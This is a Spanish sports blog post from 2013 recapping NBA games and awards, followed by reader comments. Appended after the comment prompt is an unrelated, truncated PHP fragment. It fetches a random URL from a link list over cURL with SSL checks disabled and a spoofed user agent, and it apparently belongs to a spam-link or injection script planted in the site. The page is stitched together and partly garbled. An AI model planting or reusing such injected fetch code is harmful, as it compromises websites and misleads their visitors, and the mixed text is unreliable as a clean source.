La Crónica: Kobe viene fuerte

01 de March de 2013 por txusma

No sé vosotros pero en contadas ocasiones me atrevería a apostar en contra de Kobe Bryant. El jugador de los Lakers tiene entre ceja y ceja meter a su equipo en los Playoffs a pesar de la lesión de Gasol, de los tiros libres de Dwight Howard, de la espalda de Steve Nash y de cualquier alineación de los astros que se presente. Si hace un mes parecía que el faraónico proyecto amarillo había naufragado, la realidad a día de hoy es que los Lakers están a apenas 2 victorias de los Rockets y a 2 y media de los Jazz. Y el gran culpable, como casi siempre, para lo bueno y para lo malo, es Kobe Bryant. Su mate sobre Pekovic en la segunda posesión del partido era toda una declaración de intenciones. Acabó con 33 puntos en 22 tiros incluidos 4 triples. De hecho, los Lakers se quedaron a solo un triple de su récord en un partido de la temporada regular. Anotaron 16 con Kobe y un acertado Jodie Meeks como principales aportadores. Cierto que los Wolves no fueron rival en ningún momento pero la tendencia ascendente de los Lakers es clara y parece imparable. Bien haría Gasol en preparse para los Playoffs (94-116).

El vecino consiguió una victoria de mucho prestigio a domicilio ante los Pacers (99-91). Sin Roy Hibbert, todo resultó un poco más fácil a Chris Paul, Blake Griffin y compañía. La defensa de Indiana no vivió su mejor día y su ataque fue un tanto caótico y desordenado. Eso sí, Danny Granger jugó su mejor partido desde que volvió de la lesión y se destapa como un factor clave  para los Pacers. Si asume un papel de 6º hombre, será una gran incorporación. Mejor que cualquier traspaso que hubieran podido hacer. 

 Finalmente, recital de Joakim Noah ante unos tristes Sixers. El jugador de los Bulls se convirtió en el cuarto jugador de los últimos 25 años capaz de anotar más de 20 puntos, capturar 20 rebotes y poner más de 10 tapones en un mismo partido. Ante semejante fuerza de la naturaleza poco pudieron hacer los Sixers que ya encadenan 7 derrotas consecutivas. Holiday y Hawes fueron los mejores de su equipo (82-93).

PREMIOS

MVP: Brutal triple-doble de Joakim Noah: 23 puntos, 21 rebotes y 11 tapones. En un par de días hemos podido presenciar ya 3 actuaciones fascinantes. Chris Paul y Kobe Bryant también lideraron a sus equipos a la victoria con 29 puntos, 6 rebotes y 8 asistencias el primero, y 33 puntos, 5 rebotes y 5 asistencias el segundo.

Sorpresa: En un equipo con George, West, Granger, etc. resultó ser Lance Stephenson el jugador más efectivo. Anotó 16 puntos (7 de 8), capturó 4 rebotes y repartió 7 asistencias. Jodie Meeks anotó 16 puntos para los Lakers.

Decepción: Malos días para Caron Butler (1 de 9 y solo 2 puntos) y Alexey Shved (1 de 8 y 5 puntos).

Esfuerzo en vano: Spencer Hawes anoche el mejor de los Sixers. Aportó 20 puntos y 15 rebotes. Ricky Rubio plantó cara a los Lakers con 13 puntos, 8 rebotes y 13 asistencias.

TOP 5

Imágenes | AP Photos / Getty Images

Comenta

3 comentarios a esta entrada

  1. Denise dice:
    #1

    “”El jugador de los Bulls se convirtió en el cuarto jugador de los últimos 25 años capaz de anotar más de 20 puntos, capturar 20 rebotes y poner más de 10 tapones en un mismo partido.””

    ¿Quién son los otros 3? Gracias

      Citar

  2. MagicJohnson32 dice:
    #2

    Denise:
    “”El jugador de los Bulls se convirtió en el cuarto jugador de los últimos 25 años capaz de anotar más de 20 puntos, capturar 20 rebotes y poner más de 10 tapones en un mismo partido.””

    ¿Quién son los otros 3? Gracias

    Si no me equivoco son Shaq, Olajuwon y… tachán, tachán… Shawn Bradley.

      Citar

  3. MagicJohnson32 dice:
    #3

    Sobre el Wolves @ Lakers, lo cierto es que las lesiones en Minny son una lacra y así era imposible que plantasen cara durante 48 minutos, pero LAL sigue en la línea reciente, con Kobe acertadísimo y dominante, Dwight más activo en defensa (8 tapones en los últimos dos partidos), y una gran aportación de Blake, Jamison y Meeks desde el banco. Hay que destacar de nuevo a Blake, que, ya lo dije hace poco, supone una mejora enorme respecto a Duhon y Morris. De hecho, el balance desde su vuelta es francamente bueno. Kobe volvió a hacer un 60% en tiros y lleva cuatro partidos con más del 50. Metió 33 y no jugó en el último cuarto.

    Por parte de los Wolves, la dirección de Ricky (recital en el primer cuarto) y el acierto de Ridnour y Barea sostuvieron el fuerte durante un rato, pero sin AK ni Pekovic no hay suficiente defensa ni variedad en ataque.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>